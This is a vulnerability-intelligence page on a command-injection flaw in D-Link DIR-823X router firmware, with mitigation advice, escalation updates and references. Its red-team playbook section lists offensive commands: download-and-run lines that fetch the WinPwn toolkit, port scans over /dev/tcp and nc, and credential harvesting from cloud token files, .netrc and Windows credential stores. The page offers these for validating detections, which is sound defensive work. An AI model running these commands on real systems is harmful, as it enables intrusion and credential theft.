CVE-2025-29635
Overview
This vulnerability is a command injection issue rooted in improper input validation within the firmware of D-Link DIR-823X models 240126 and 240802. The flaw exists in the handling of POST requests to the /goform/set_prohibiting endpoint, where user-supplied input is passed to system-level command execution functions without adequate sanitization. The affected component is the web management interface responsible for processing configuration commands, specifically the function invoked by the set_prohibiting form handler.
Vulnerability Description
A command injection vulnerability in D-Link DIR-823X 240126 and 240802 allows an authorized attacker to execute arbitrary commands on remote devices by sending a POST request to /goform/set_prohibiting via the corresponding function, triggering remote command execution.
Impact
An attacker with valid credentials can execute arbitrary system commands on the affected device, gaining control over the underlying operating system. This enables unauthorized actions such as modifying configurations, installing persistent malware, or disrupting network operations. The prerequisite is possession of an authorized account on the device’s management interface. Successful exploitation can lead to full device compromise, allowing lateral movement within the network or interception of network traffic, resulting in significant operational and data security risks.
Solution
D-Link has not published a formal advisory with patch details for this issue; however, the referenced GitHub repository provides analysis and mitigation guidance. Administrators should restrict access to the web management interface to trusted users only and disable remote management if not required. Monitoring for unusual POST requests to /goform/set_prohibiting is recommended. For detailed remediation steps, consult the D-Link support portal or official firmware updates corresponding to DIR-823X models 240126 and 240802 when available.
EPSS vs KEV Prediction — Evolution (30 days)
Overview
Analysis generation failed
Threat Summary
Analysis generation failed
Full Analysis
The command injection vulnerability present in specific firmware versions of the D-Link DIR-823X router series allows an authorized attacker to execute arbitrary commands on the device. This vulnerability arises from improper validation of user input in the POST request directed at the /goform/set_prohibiting endpoint. When an attacker crafts a malicious request, they can manipulate the command execution flow, leading to unauthorized operations on the router. The lack of stringent input sanitization enables the execution of system commands, which can compromise the integrity and confidentiality of the device and the network it manages.
Exploitation of this vulnerability can occur through various attack vectors. An attacker with access to the local network, or one who has obtained valid credentials, can send specially crafted POST requests to the vulnerable endpoint. This scenario highlights the importance of network segmentation and access control, as an attacker does not need to exploit a flaw in the router’s firmware directly but can leverage legitimate access to execute harmful commands. Furthermore, if the router is exposed to the internet with weak or default credentials, the risk of exploitation increases significantly. Attackers could potentially gain control over the device to perform actions such as intercepting network traffic, launching further attacks on internal systems, or using the device as a pivot point to access other network resources.
The real-world impact of this vulnerability can be substantial, particularly for organizations relying on the affected router models for their network infrastructure. Successful exploitation could lead to unauthorized access to sensitive data, disruption of services, or even complete network compromise. The business risks associated with such incidents include financial losses, reputational damage, and regulatory penalties, especially if the compromised devices are part of a larger network handling sensitive information. Moreover, the potential for lateral movement within the network could expose additional vulnerabilities, amplifying the overall risk to the organization.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating firmware to the latest versions can help close known vulnerabilities, as manufacturers often release patches to address security issues. Additionally, employing network monitoring tools can help identify unusual traffic patterns or unauthorized access attempts, allowing for timely intervention. Implementing strong authentication mechanisms, such as complex passwords and multi-factor authentication, can further reduce the risk of unauthorized access. Finally, organizations should conduct regular security assessments and penetration testing to identify and remediate vulnerabilities proactively, ensuring that their network remains secure against emerging threats.
In conclusion, the command injection vulnerability in the D-Link DIR-823X router series poses a significant threat to both individual users and organizations. The potential for unauthorized command execution highlights the critical need for robust security practices, including regular firmware updates, strong access controls, and proactive monitoring. By understanding the nature of this vulnerability and implementing effective detection and mitigation strategies, organizations can better protect their networks from exploitation and reduce the associated business risks.
CSURFACE threat intelligence has identified a marked escalation in activity related to CVE-2025-29635, as evidenced by a significant increase in detections across our telemetry. This vulnerability’s inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog underscores its growing prominence and the urgency for defenders to prioritize awareness. The assignment of a CVSS score of 7.2 reflects a reassessment of its impact severity, aligning with observed exploitation potential. Additionally, the emergence of a substantial EPSS score, currently in the upper percentiles and trending upward, signals an elevated likelihood of exploitation attempts in operational environments. Although no new exploit techniques or ransomware associations have been confirmed, the convergence of these factors indicates a heightened threat posture. Consequently, the risk level for this vulnerability has escalated from theoretical concern to a credible and active threat, demanding increased vigilance in detection and response efforts.
Update 2 — July 04, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2025-29635, with telemetry indicating a significant uptick in exploitation attempts targeting the D-Link DIR-823X devices. This surge is corroborated by a substantial increase in the Exploit Prediction Scoring System (EPSS) score, which now places the vulnerability in the highest percentile for exploitation likelihood. The rapid upward trend in EPSS underscores a growing attacker interest and suggests that exploitation attempts are becoming more frequent and potentially more sophisticated. Although no new exploit variants or ransomware affiliations have been identified, the amplified detection signals a shift from theoretical risk to active threat, elevating the urgency for defenders to enhance monitoring and incident response capabilities. This development effectively raises the threat level to critical, reflecting an environment where exploitation attempts are increasingly probable and may soon translate into widespread operational impact.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Dlink | Dir-823x Firmware | 240126 |
cpe:2.3:o:dlink:dir-823x_firmware:240126:*:*:*:*:*:*:*
|
|
|
Dlink | Dir-823x Firmware | 240802 |
cpe:2.3:o:dlink:dir-823x_firmware:240802:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
11 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Sighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-29635 |
| github.com |
GitHub CVE
|
https://github.com/mono7s/Dir-823x/blob/main/set_prohibiting/set_prohibiting.md |
| akamai.com |
NVD API
Exploit
Third Party Advisory
|
https://www.akamai.com/blog/security-research/2026/apr/cve-2025-29635-mirai-campaign-targets-d-link-devices |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-29635 |